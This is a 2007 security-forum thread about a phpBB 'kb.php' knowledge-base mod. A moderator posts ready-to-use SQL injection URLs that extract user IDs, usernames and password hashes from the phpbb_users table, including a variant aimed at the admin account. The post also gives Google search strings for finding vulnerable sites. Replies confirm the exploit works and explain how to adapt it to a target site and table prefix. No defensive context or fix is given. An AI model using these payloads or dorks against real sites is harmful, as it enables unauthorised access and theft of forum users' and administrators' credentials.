 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
phpBB *kb.php* exploit |
 |
 Posted: Tue Jul 10, 2007 8:24 pm |
 |
|
| Sm0ke |
| Moderator |
 |
|
| Joined: Nov 25, 2006 |
| Posts: 141 |
| Location: Finland |
|
|
 |
|
 |
|
| Code: | http://victim/phpfm/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+>+0&page_num=2&cat=1
|
to get only admin user (usually id2) use this
| Code: | http://victim/phpfm/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id=2&page_num=2&cat=1
|
Google Search:
"Modified by Fully Modded"
"all content is copyright" "its original authors" kb.php |
|
|
|
|
|
didn't work |
|
| Posted: Wed Jul 11, 2007 12:51 pm |
|
|
| bittertruth |
| Regular user |
 |
|
| Joined: Jul 11, 2007 |
| Posts: 9 |
|
|
|
|
|
|
|
i got message like this
You don't have permission to access /myktmportal_data/kb.php on this server.
now, what possibly be the wrong. any idea?? |
|
|
|
|
| Posted: Wed Jul 11, 2007 2:04 pm |
|
|
| Sm0ke |
| Moderator |
|
|
| Joined: Nov 25, 2006 |
| Posts: 141 |
| Location: Finland |
|
|
|
|
|
|
| make user to that forum, sometimes you need to be logged in |
|
|
|
|
| Posted: Wed Jul 11, 2007 5:08 pm |
|
|
| bittertruth |
| Regular user |
|
|
| Joined: Jul 11, 2007 |
| Posts: 9 |
|
|
|
|
|
|
|
seems it's not working and there is no kb.php files anywhere in my server. there is not even common.php in /includes folder.
In fact, i wanted to try if my site is compromised or not. I've a access as administrator and i 've registered as a normal user few hours aGo,
From my laptop, i tried to apply this script but always it says, 'You are unauthorized to view this page" or something like even after logging in as a normal user.
seems it's not working for me. but still i think i'm not safe.
thank you for your time. if anything comes up, please let me know, would be obliged to you. |
|
|
|
|
| Posted: Wed Jul 11, 2007 5:19 pm |
|
|
| bittertruth |
| Regular user |
|
|
| Joined: Jul 11, 2007 |
| Posts: 9 |
|
|
|
|
|
|
|
One more thing, my admin page says i'm running latest version of phpbb
so, is this exploit not working because of that? or what? kindly let me know that too. |
|
|
|
|
| Posted: Wed Jul 11, 2007 6:43 pm |
|
|
| Sm0ke |
| Moderator |
|
|
| Joined: Nov 25, 2006 |
| Posts: 141 |
| Location: Finland |
|
|
|
|
|
|
1. Next time edit your post dont make new post
2. This exploit is for all versions of phpBB, but they must have this mod installed in it |
|
|
|
|
| Posted: Sat Jul 14, 2007 9:13 am |
|
|
| blaxenet |
| Active user |
|
|
| Joined: Jun 20, 2007 |
| Posts: 26 |
|
|
|
|
|
|
|
This exploit works perfect 
Good find Sm0ke! |
|
_________________
Blaxenet |
|
|
|
| Posted: Sat Jul 14, 2007 11:44 am |
|
|
| bittertruth |
| Regular user |
|
|
| Joined: Jul 11, 2007 |
| Posts: 9 |
|
|
|
|
|
|
|
Blaxenet,
how did you do?
i wrote my domain name in place of victim (in following kb script hack) and in place of phpfm, i put the directory where the board is installed. Am i doing something wrong??
,username,char(5 ,user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+>+0&page_num=2&cat=1" target="_blank">http://victim/phpfm/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(5,username,char(5,user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+>+0&page_num=2&cat=1 |
|
|
|
|
|
|
|
|
| Posted: Sat Jul 14, 2007 11:57 am |
|
|
| blaxenet |
| Active user |
|
|
| Joined: Jun 20, 2007 |
| Posts: 26 |
|
|
|
|
|
|
|
Let's say there is a vulnerable site http://www.testdomain.tld/phpfm/index.php
Remove the index.php and replace it with the following code;
| Code: | | kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id=2&page_num=2&cat=1 |
You may need to be a registered member & signed in for this to work.
Also, the table prefix may not be phpbb_ depending on how it was configured.
If your still having trouble send me a PM or Email with the URL of the website.
Then I will check it out and see what the story is. |
|
_________________
Blaxenet |
|
|
|
| Posted: Sat Jul 14, 2007 12:36 pm |
|
|
| bittertruth |
| Regular user |
|
|
| Joined: Jul 11, 2007 |
| Posts: 9 |
|
|
|
|
|
|
|
blaxenet, i really appreciate your help. i just sent a pm to you.
thanks. |
|
|
|
|
| Posted: Wed Jul 18, 2007 10:25 pm |
|
|
| NpLm |
| Beginner |
|
|
| Joined: Jul 18, 2007 |
| Posts: 1 |
|
|
|
|
|
|
|
| thanks blaxenet |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 68
Members: 0
Total: 68
